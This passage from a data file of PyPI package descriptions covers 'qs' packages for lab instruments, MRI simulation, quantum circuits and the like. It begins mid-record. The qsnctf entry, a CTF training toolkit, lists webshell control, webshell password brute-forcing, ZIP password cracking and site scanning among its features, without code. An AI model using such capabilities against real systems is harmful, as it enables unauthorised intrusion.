above.boxes: Rectilinear bounding box labels for the image of the form:pt1[required]: The top-left point as an{x: float, y: float}object.pt2[required]: The bottom-right point. Same format aspt1.labels: An object of the same form as theimagekey above.masks: Segmentation masks of the form:dimensions[required]: The dimensions of the segmentation mask as awidth: int, height: intobject.counts[required]: A COCO-style run-length-encoded mask.For videos, it is an array of objects representing frame labels. Each object has the form:timestamp[required]: The timestamp in the video for the labeled frame.end: The end timstamp, for cases where the user is labeling a range of frames. They can do this by alt-clicking on the playbar to select an end frame.labels: Same as the imagelabelsproperty, but for the timestamped frame (i.e., an object withimage,polygons,boxes, andmasks).defaults: The default labels that will appear with given item. Useful for cases where you want to present a default case to the user that they can simply accept and move on. Has the same structure asdefaults.allowConfigChange: Whether allow the user to change the labeling configuration from within the interface. Defaults to true.maxCanvasSize: The maximum size for drawing segmentation maps. Defaults to 512. 
Images larger than this size will be downsampled for segmentation map purposes.maxViewHeight: The maximum view size for the UI. Defaults to 512. You will be able to pan/zoom around larger images.mode: The style in which to present the UI. Choose between \"light\" or \"dark\". Defaults to \"light\".batchSize: For images, the maximum number of images to show for labeling simultaneously. Any value greater than 1 is incompatible with any configuration that includesregions. Videos and time series will still be labeled one at a time.jsonpath: The location in which to save labels and configuration for this labeler. If neither this property nor the top-leveljsonpathparameters are set, you must get the labels fromlabeler.items. Note that if the file at this path conflicts with any of the settings provided as arguments, the settings in the file will be used instead.Command Line ApplicationYou can launch the same labeling interface from the command line usingqsl label <...files>. If the project file does not exist, it will be created. The files you provide will be added. If the project file already exists, files that aren't already on the list will be added. You can edit the project file to modify the settings that cannot be changed from within the UI (i.e.,allowConfigChange,maxCanvasSize,maxViewHeight,mode, andbatchSize).DevelopmentCreate a local development environment usingmake initRun widget development with live re-building usingmake developRun a Jupyter Lab instance usingmake lab. Changes to the JavaScript/TypeScript require a full refresh to take effect."} +{"package": "qslib", "pacakge-description": "Our DNA 28 poster is available here.Documentation:Stable,LatestqslibQSLib is a package for interacting with Applied Biosystems' QuantStudio\nqPCR machines, primarily intended for non-qPCR uses, such as DNA computing and\nmolecular programming systems. It allows the creation, processing, and\nhandling of experiments and experiment data, and interaction with\nmachines through their network connection and SCPI interface.The package was originally written for 96-well-block QuantStudio 5 machines.\nHowever, it has some support for other machines, particularly for reading\nEDS files: it supports v1.3 and (partially) v2.0 specification EDS files,\nand should be able to read at least some data from files generated by\nViia7, QuantStudio 3, QuantStudio 5, QuantStudio 6 Flex, and QuantStudio 6 Pro\nmachines, with 96-well and 384-well blocks. If you have problems reading EDS files,\nor have found that it works with other machines, please let me know.Amongst other features that it has:Direct fluorescence data (\"filter data\") as Pandas dataframes, with\ntimes and temperature readings.Running-experiment data access, status information, and control.Protocol creation and manipulation, allowing functions outside of\nAB's software. Protocols can be modified and updated mid-run.Temperature data at one-second resolution during experiments.Machine control functions: immediate pauses and resumes, drawer\ncontrol, power, etc.With qslib-monitor: live monitoring of machine state information,\nwith Matrix notifications, InfluxDB storage, and Grafana dashboards.Installation and SetupQSLib is pure Python, and can be installed via pip:pip3 install -U qslibOr, for the current Github version:pip3 install -U --pre git+https://github.com/cgevans/qslibIt requires at least version 3.9 of Python. 
While it uses async code at\nits core for communication, it can be used conveniently in Jupyter or\nIPython.To use the library for communication with machines, you'll need a\nmachine access password with Observer (for reading data and statuses)\nand/or Controller (for running experiments and controlling the machine)\naccess. You will also need access to the machine on port 7443 (machine\nsoftware versions 1.3.4 and higher), or port 7000 (earlier software versions).In machine software versions 1.3.4 and higher, you can set a password using\nthe \"OEM Connection Only\" option in \"Settings\". Earlier software versions\nmust have passwords set by other methods. Regardless of version, I strongly\nrecommend against having the machines be accessible online: use a restricted VPN\nconnection or port forwarding. See the documentation for more information.Contributing and issue reportingIssue reports and enhancement requests can be submitted via Github.Potential contributions can be submitted via Github. These should include pytest tests, preferably\nboth tests that can be run without outside resources, and, if applicable, tests that directly test\nany communication with a QuantStudio SCPI server. They will also need a Contributor Licence Agreement.Private vulnerability reports can be sent to me by\nemail, PGP-encrypted, or via Matrix to@cge:matrix.org.DisclaimerThis package was developed for my own use. It may break your machine or\nvoid your warranty. Data may have errors or be incorrect. When used to\nsend raw commands at high access levels, the machine interface could\nrender your machine unusable or be used to send commands that would\nphysically/electrically damage the machine or potentially be hazardous\nto you or others.I am not any way connected with Applied Biosystems. 
I have developed this\npackage using the machine's documentation system and standard file formats."} +{"package": "qsm", "pacakge-description": "qsm: a Python module for manipulating quantum circuits. Installation: pip install qsm. Usage example:
from qsm import QuantumCircuit
# Create a quantum circuit with 3 qubits
circuit = QuantumCircuit(3)
# Apply a Hadamard gate to the first qubit
circuit.h(0)
# Apply a CNOT gate between the first and the second qubit
circuit.cx(0, 1)
# Measure the state of the circuit
resultats = circuit.measure_all(shots=1024)
print(resultats)
License: this project is under a custom licence; just send a message to the module's owner for his agreement before copying, etc. Contribution: this project can be contributed to in different ways:\nReddit: leave a message in r/python to contribute; GitHub: create a repository to add features if necessary."} +{"package": "qsmap", "pacakge-description": "No description available on PyPI."} +{"package": "qsmcli", "pacakge-description": "qsmcli: Q system management command line tool. Installation: you will need to install python3 first; qsmcli can then be installed with\n# pip3 install qsmcli
Running qsmcli: python3 -m qsmcli. Supported shell mode and commands: Command line mode: when this command is invoked with any arguments, the command is executed directly. Shell mode: if no argument is specified, shell mode is entered.\nThe host and username/password are saved in the prompt. Commands supported: help/?: any command invoked together with the help command will print the help message. ipmi: this command redirects all of its arguments to ipmitool. mac: get the system MAC command; prints out the system MAC addresses we have.\nmac [index], index range from 0 to 5,\nfor example: mac 0. cpld: get CPLD information:\ncpld [fw|cksum|id]\nfw: get CPLD fw\ncksum: get CPLD checksum\nid: get CPLD idcode. me: query ME related information.\nme [version|cpu|dimm|io]\nme version: to get ME version\nme cpu: to get CPU utilization\nme dimm: to get DIMM utilization\nme io: to get IO utilization. nic: get or set the BMC dedicated/shared NIC.\nnic [dedicate|lom-share|mezz-share0|mizz-share1]\nReturn: \nFor LAN Card Type,\n0h- BMC Dedicated\n2h- Shared NIC (OCP Mezzanine slot)\n3h- Shared NIC (QCT Mezzanine slot). service: enable/disable service commands:\nservice [enable/disable] [web|kvm|cd-media|hd-media|ssh|solssh]\nPlease note that this utility gets the service configuration data and\nsets the configuration data when setting it. It does not guarantee that the BMC has this feature. Test: to run the unit tests, use 'python3 -m unittest'.\nUploading to GitHub will trigger Travis CI to run the unit tests. Distribute the package: to generate the package, use 'package.sh' to build it."} +{"package": "qsm-forward", "pacakge-description": "QSM Forward Model. Based on Marques, J. P., et al. (2021). QSM reconstruction challenge 2.0: A realistic in silico head phantom for MRI data simulation and evaluation of susceptibility mapping procedures.
Magnetic Resonance in Medicine, 86(1), 526-542.https://doi.org/10.1002/mrm.28716Includes code for:Field model (forward multiplication with dipole kernel based on chi)Signal model (magnitude and phase simulation based on field/M0/R1/R2star)Phase offset modelNoise modelShim field modelk-space croppingInstallpip install qsm-forwardExample using simulated sourcesIn this example, we simulated susceptibility sources (spheres and rectangles) to generate a BIDS directory:importqsm_forwardif__name__==\"__main__\":recon_params=qsm_forward.ReconParams()recon_params.subject=\"simulated-sources\"recon_params.peak_snr=100tissue_params=qsm_forward.TissueParams(chi=qsm_forward.generate_susceptibility_phantom(resolution=[100,100,100],background=0,large_cylinder_val=0.005,small_cylinder_radii=[4,4,4,7],small_cylinder_vals=[0.05,0.1,0.2,0.5]))qsm_forward.generate_bids(tissue_params,recon_params,\"bids\")bids/\n\u2514\u2500\u2500 sub-simulated-sources\n \u2514\u2500\u2500 ses-1\n \u251c\u2500\u2500 anat\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-1_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-1_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-1_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-1_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-2_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-2_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-2_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-2_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-3_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-3_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-3_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-3_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-4_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-4_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-4_part-phase_MEGRE.json\n \u2502 \u2514\u2500\u2500 sub-simulated-sources_ses-1_run-1_echo-4_part-phase_MEGRE.nii\n \u2514\u2500\u2500 extra_data\n \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_chi.nii\n \u251c\u2500\u2500 sub-simulated-sources_ses-1_run-1_mask.nii\n \u2514\u2500\u2500 sub-simulated-sources_ses-1_run-1_segmentation.niiSome repesentative images including the mask, first and last-echo phase image, and ground truth susceptibility (chi):Example using head phantom dataIn this example, we generate a BIDS-compliant dataset based on therealistic in-silico head phantom. 
If you have access to the head phantom, you need to retain thedatadirectory which provides relevant tissue parameters:importqsm_forwardimportnumpyasnpif__name__==\"__main__\":tissue_params=qsm_forward.TissueParams(root_dir=\"~/data\")recon_params_all=[qsm_forward.ReconParams(voxel_size=voxel_size,peak_snr=100,session=session)for(voxel_size,session)in[(np.array([0.8,0.8,0.8]),\"0p8\"),(np.array([1.0,1.0,1.0]),\"1p0\"),(np.array([1.2,1.2,1.2]),\"1p2\")]]forrecon_paramsinrecon_params_all:qsm_forward.generate_bids(tissue_params=tissue_params,recon_params=recon_params,bids_dir=\"bids\")bids/\n\u2514\u2500\u2500 sub-1\n \u251c\u2500\u2500 ses-0p8\n \u2502 \u251c\u2500\u2500 anat\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-1_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-1_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-1_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-1_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-2_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-2_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-2_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-2_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-3_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-3_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-3_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-3_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-4_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-4_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_echo-4_part-phase_MEGRE.json\n \u2502 \u2502 \u2514\u2500\u2500 sub-1_ses-0p8_run-1_echo-4_part-phase_MEGRE.nii\n \u2502 \u2514\u2500\u2500 extra_data\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_chi.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p8_run-1_mask.nii\n \u2502 \u2514\u2500\u2500 sub-1_ses-0p8_run-1_segmentation.nii\n \u251c\u2500\u2500 ses-1p0\n \u2502 \u251c\u2500\u2500 anat\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-1_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-1_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-1_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-1_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-2_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-2_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-2_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-2_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-3_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-3_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-3_part-phase_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-3_part-phase_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-4_part-mag_MEGRE.json\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-4_part-mag_MEGRE.nii\n \u2502 \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_echo-4_part-phase_MEGRE.json\n \u2502 \u2502 \u2514\u2500\u2500 
sub-1_ses-1p0_run-1_echo-4_part-phase_MEGRE.nii\n \u2502 \u2514\u2500\u2500 extra_data\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_chi.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p0_run-1_mask.nii\n \u2502 \u2514\u2500\u2500 sub-1_ses-1p0_run-1_segmentation.nii\n \u2514\u2500\u2500 ses-1p2\n \u251c\u2500\u2500 anat\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-1_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-1_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-1_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-1_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-2_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-2_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-2_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-2_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-3_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-3_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-3_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-3_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-4_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-4_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-1p2_run-1_echo-4_part-phase_MEGRE.json\n \u2502 \u2514\u2500\u2500 sub-1_ses-1p2_run-1_echo-4_part-phase_MEGRE.nii\n \u2514\u2500\u2500 extra_data\n \u251c\u2500\u2500 sub-1_ses-1p2_run-1_chi.nii\n \u251c\u2500\u2500 sub-1_ses-1p2_run-1_mask.nii\n \u2514\u2500\u2500 sub-1_ses-1p2_run-1_segmentation.niiSome repesentative images including the ground truth chi map, first-echo magnitude image, and first and last-echo phase images:Example including T1-weighted imagesimportqsm_forwardimportnumpyasnpif__name__==\"__main__\":tissue_params=qsm_forward.TissueParams(root_dir=\"~/data\",chi=\"ChiModelMIX.nii.gz\")recon_params_all=[qsm_forward.ReconParams(voxel_size=voxel_size,session=session,TEs=TEs,TR=TR,flip_angle=flip_angle,suffix=suffix,save_phase=save_phase)for(voxel_size,session,TEs,TR,flip_angle,suffix,save_phase)in[(np.array([0.64,0.64,0.64]),\"0p64\",np.array([3.5e-3]),7.5e-3,40,\"T1w\",False),(np.array([0.64,0.64,0.64]),\"0p64\",np.array([0.004,0.012,0.02,0.028]),0.05,15,\"T2starw\",True),]]forrecon_paramsinrecon_params_all:qsm_forward.generate_bids(tissue_params=tissue_params,recon_params=recon_params,bids_dir=\"bids\")bids/\n\u2514\u2500\u2500 sub-1\n \u2514\u2500\u2500 ses-0p64\n \u251c\u2500\u2500 anat\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-1_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-1_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-1_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-1_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-2_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-2_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-2_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-2_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-3_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-3_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-3_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 
sub-1_ses-0p64_run-1_echo-3_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-4_part-mag_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-4_part-mag_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-4_part-phase_MEGRE.json\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_echo-4_part-phase_MEGRE.nii\n \u2502 \u251c\u2500\u2500 sub-1_ses-0p64_run-1_T1w.json\n \u2502 \u2514\u2500\u2500 sub-1_ses-0p64_run-1_T1w.nii\n \u2514\u2500\u2500 extra_data\n \u251c\u2500\u2500 sub-1_ses-0p64_run-1_chi.nii\n \u251c\u2500\u2500 sub-1_ses-0p64_run-1_mask.nii\n \u2514\u2500\u2500 sub-1_ses-0p64_run-1_segmentation.niiSome repesentative images including the T2starw and T1w magnitude images:Example simulating oblique acquisitionIn thisexample, we simulated spherical susceptibility sources to generate a BIDS directory with a range of B0 directions:On the left is the phase image with the two sources with an axial B0 direction. On the right is a phase image with the two sources with a B0 direction rotated 30 degrees about the x axis."} +{"package": "qsml", "pacakge-description": "qsmlqsml is a markup language for key value securities (stock name, amount)quick securities markup language is a project geared towards listing portfolios for performing data analysis uponInstallationgit clone https://github.com/michaelpeterswa/qsml.git\n\nor\n\npip3 install qsmlOr download the file manually.Release History1.0.0Opened Repository (06.25.2020)MetaMichael Peters -enter additional contact information hereDistributed under the MIT license. SeeLICENSEfor more information."} +{"package": "qs-mps", "pacakge-description": "qs-mpsqs-mps is a Python package that enables researchers to simulate Quantum Systems with Matrix Product State tensors.InstallationYou can install qs-mps either by cloning the repository or using pip.pipinstallqs-mpsClone the RepositoryTo clone the repository locally, use the following command:gitclonegit@github.com:Fradm98/qs-mps.git"} +{"package": "qSMTP", "pacakge-description": "No description available on PyPI."} +{"package": "qsmxt", "pacakge-description": "QSMxT is an end-to-end software toolbox for Quantitative Susceptibility Mapping"} +{"package": "qsnark-python-sdk", "pacakge-description": "Document seehttps://github.com/hyperchaincn/qsnark-python-sdk"} +{"package": "qsnctf", "pacakge-description": "\ud83e\udd14What is 
QSNCTF? The Youth CTF Training Platform (青少年CTF训练平台) is a public-welfare, free online CTF platform for young people all over China to learn and train on. qsnctf (this repository) is a Python package written by the Youth CTF Training Platform; it is an open-source package intended to let everyone quickly use some common CTF functionality from Python. It contains many frequently used CTF features, such as Base encodings and hash functions, and even rarer ones such as the \"core socialist values\" encoding and quipqiup. Note: Ver 0.0.8.7, released on 2023-01-09, already supports archive password cracking and all of the features listed below; the Function documentation is being migrated to: https://docs.qsnctf.com/. The first release was expected around 2022-01-10, so stay tuned. If you have good ideas or suggestions, feel free to contact me: QQ: 1044631097. Documentation in other languages: English. Function library: usage instructions. Installation: first download the project from GitHub; among the files there is a setup.py. Open a terminal and type: python setup.py install. Alternatively, you can install directly with pip **(since this Python library is still under development, the pip release may not be the latest version; if you have higher requirements, you can clone this repository and install from it)**: pip install qsnctf. A successful installation shows: Successfully installed PyExecJS-1.5.1 qsnctf-0.0.4. You can also update this library with the following command: pip install --upgrade qsnctf. If you want to know how to use it in detail, import the package and then use help(qsnctf) to inspect the library:
>>> import qsnctf
>>> help(qsnctf)
Help on package qsnctf:

NAME
    qsnctf

PACKAGE CONTENTS
    base crypto hash main misc uuid

FILE
    c:\users\xiniyi\appdata\local\programs\python\python39\lib\site-packages\qsnctf-0.0.4-py3.9.egg\qsnctf\__init__.py
Then use help() on any of the modules listed under PACKAGE CONTENTS to see its specific usage. Demo: viewing the usage of base:
>>> help(qsnctf.base)
Help on module qsnctf.base in qsnctf:

NAME
    qsnctf.base

DESCRIPTION
    # Base encode/decode functions
    # 2023-01-01
    # 末心 (Moxin)

FUNCTIONS
    base16_decode(text)
    base16_encode(text)
    base32_decode(text)
    base32_encode(text)
    base64_decode(text)
    base64_encode(text)
    base85_decode(text)
>>>
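The other codecs listed in that help output follow the same call pattern; for example, a base32 round trip might look like this sketch (based only on the function names shown above, and the same call pattern as the base64 examples further down):
from qsnctf import *

a = base32_encode(\"flag{test}\")   # encode, same style as base64_encode
print(base32_decode(a))           # prints the original string back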
\u672b\u5fc3FUNCTIONSbase16_decode(text)base16_encode(text)base32_decode(text)base32_encode(text)base64_decode(text)base64_encode(text)base85_decode(text)>>>\u529f\u80fd\u5217\u8868BASEbase16base32base36base58base62base64base85base91base92base100\u81ea\u5b9a\u4e49base64CRYPTO\u51ef\u6492\u5bc6\u7801\u51ef\u6492\u7206\u7834\u57f9\u6839\u5bc6\u7801ROT5ROT13ROT18\u516b\u5366\u5bc6\u7801\u57c3\u7279\u5df4\u4ec0\u7801\u6469\u65af\u5bc6\u7801\uff08\u652f\u6301\u81ea\u5b9a\u4e49\uff09MD5md5sha1sha224sha256sha384sha512shake128shake256HMAC-SHA256sha3-224sha3-256sha3-385sha3-512MISC\u6838\u5fc3\u4ef7\u503c\u89c2\u52a0\u5bc6\u89e3\u5bc6\u6587\u672c\u9006\u5411url\u52a0\u5bc6\u89e3\u5bc6\u4f4d\u5f02\u6216\u6587\u672c\u9006\u5411\uff08\u6b65\u957f2\uff09\u6587\u672c\u9006\u5411\uff08\u81ea\u5b9a\u4e49\u6b65\u957f\uff09\u83b7\u53d6uuidord\u8f6c\u5b57\u7b26\u4e32\u5b57\u7b26\u4e32\u8f6cord\u5b57\u7b26\u4e32\u5206\u5272flag\u5bfb\u627e\u767e\u5bb6\u59d3\u7f16\u7801Qwerty\u7f16\u7801HTM\u7f16\u7801JSFUCKAAencodestr2hexhex2strZIP\u5bc6\u7801\u7206\u7834ZIP\u89e3\u538b\u7f29\uff08\u9ad8\u7ea7\uff09APIquipqiup\u8bcd\u9891\u5206\u6790\u98de\u4e66Webhook\u9489\u9489Talk\u5fae\u6b65\u5728\u7ebfFOFA\u5927\u5723\u4e91\u6c99\u7bb1\u96f6\u96f6\u4fe1\u5b89Go-CQ-HTTPWEB\u76ee\u5f55\u626b\u63cf\u7f51\u7ad9\u5b58\u6d3b\u68c0\u6d4b\u53d6\u7f51\u7ad9\u6807\u9898\u5b50\u57df\u540d\u626b\u63cf\u53d6\u7f51\u7ad9\u63cf\u8ff0\u53d6\u7f51\u7ad9\u5173\u952e\u5b57\u53d6\u7f51\u7ad9ICP\u53d6\u7f51\u7ad9a\u6807\u7b7e\u5730\u5740\u53d6\u7f51\u7ad9\u6ce8\u91ca\u53d6\u7f51\u7ad9\u54cd\u5e94\u65f6\u95f4\u53d6\u7f51\u7ad9ICOPOST WebshellGET Webshellexec-shelleval-shellWebShell\u7206\u7834\u5177\u4f53\u4f7f\u7528\u547d\u4ee4\u884c\u4f7f\u7528\u7b2c\u4e00\u6b65\u5bfc\u5165qsnctf\u5e93fromqsnctfimport*\u4f8b\u5982\u9700\u8981\u4f7f\u7528base64\u7f16\u7801base64_encode(\"\u9700\u8981\u7f16\u7801\u7684\")# 6ZyA6KaB57yW56CB55qE\u76f8\u540c\u5982\u679c\u4f7f\u7528base64\u89e3\u7801\u7684\u8bdd\u5c31\u662fbase64_decode(\"6ZyA6KaB57yW56CB55qE\")# \u9700\u8981\u7f16\u7801\u7684\u5176\u4ed6\u7684\u7f16\u7801\u89e3\u7801\u7c7b\u4f3c\u7f16\u8bd1\u5668\u4f7f\u7528\u8fd9\u91cc\u8fd8\u662f\u4f7f\u7528base64\u6765\u6f14\u793a\uff0c\u5176\u4ed6\u7684\u7f16\u7801\u89e3\u7801\u7c7b\u4f3c\u3002fromqsnctfimportqsnctfa=base64_encode(\"\u9700\u8981\u7f16\u7801\u7684\")print(a)b=base64_decode(\"6ZyA6KaB57yW56CB55qE\")print(b)\u8fd4\u56de\u4fe1\u606f\u9700\u8981\u7f16\u7801\u76846ZyA6KaB57yW56CB55qEBase62\u7684encode\u503c\u5e94\u8be5\u662f\u6574\u6570\uff01fromqsnctfimportqsnctfa=base62_encode(34441886726)print(a)b=base62_decode(\"base62\")print(b)\u4f20\u53c2\u65b9\u6cd5\u6587\u6863\u79fb\u52a8\u5230\uff1aFunction.md\u73af\u5883\u5f00\u53d1\u73af\u5883Windows11 + Python3.11 + PyCharm 2022.3.1 (Professional Edition)\u4f7f\u7528\u73af\u5883\u652f\u6301python 3.x\u73af\u5883\u3002\u6587\u6863\u6301\u7eed\u66f4\u65b0\u3002\u2728 Contributors\u611f\u8c22\u4e0b\u9762\u7684\u6240\u6709\u4eba\uff1aMoxinxinyiyiye-yfs"} +{"package": "qs_nester", "pacakge-description": "UNKNOWN"} +{"package": "qsolve", "pacakge-description": "QSolveQSolve provides numerical methods for the simulation and optimization\nof ultracold atom experiments at zero and finite temperature.RequirementsUbuntu 22.04 or Windows 11Python 3.11Getting Startedpip install qsolveUpdateTo upgrade the installed qsolve package to its latest version, please use:pip install --upgrade qsolve"} +{"package": "qson", "pacakge-description": "UNKNOWN"} +{"package": "qsonic", "pacakge-description": "Lightining-fast 
continuum fittingQSOnicis an MPI-parallelized, highly optimized quasar continuum fitting package for DESI built on the same algorithm aspicca, butfaster. It also provides an efficient API to read DESI quasar spectra.The key differencesCoadding of spectrograph arms can be performed after continuum fitting or disabled entirely.Continuum is multiplied by a fiducial mean flux when provided.You can pass fiducial var_lss (columnVAR_LSS) and mean flux (columnMEANFLUX) for observed wavelengthLAMBDAinSTATSextention of a FITS file. Wavelength should be linearly and equally spaced. This is the same format as rawio output from picca, exceptVARcolumn in picca is the variance on flux not deltas. We break away from that convention by explicitly requiring variance on deltas in a new column.If no fiducial is passed, we fit only for var_lss (no eta fitting by default). Eta fitting can be enabled, but is not recommended for Lya forest.Internal weights for continuum fitting and coadding are based on smoothedIVAR, and outputWEIGHTis based on this smoothed ivar. This smoothing can be turned off.Chi2 information as well as best fits are saved in continuum_chi2_catalog.fits. Chi2 is calculated using smooth ivar and var_lss, and does not subtract sum of ln(weights).SimilaritiesDelta files are the same.CONTcolumn is mean flux times continuum even when fiducial mean flux is passed.MEANSNRin header file and chi2 catalog is average of flux times square root of positive ivar values. Header values are per arm, but catalog values are the average over all arms.Eta fitting does not rescaleIVARoutput. Pipeline noise will be modified with explicit calibration option."} +{"package": "qsosed", "pacakge-description": "No description available on PyPI."} +{"package": "qsotools", "pacakge-description": "No description available on PyPI."} +{"package": "qsp", "pacakge-description": "Quantum State PreparationThis repository provides an implementation of various methods for preparing tensor network states (specifically, 1D tensor network states) on a quantum computer.To use the package, you first need to specify a list of NumPy arrays that represent the MPS. You can then\ncall different routines in the package to prepare the state.Installationpip install qspOne can also install the development version directly aspip install 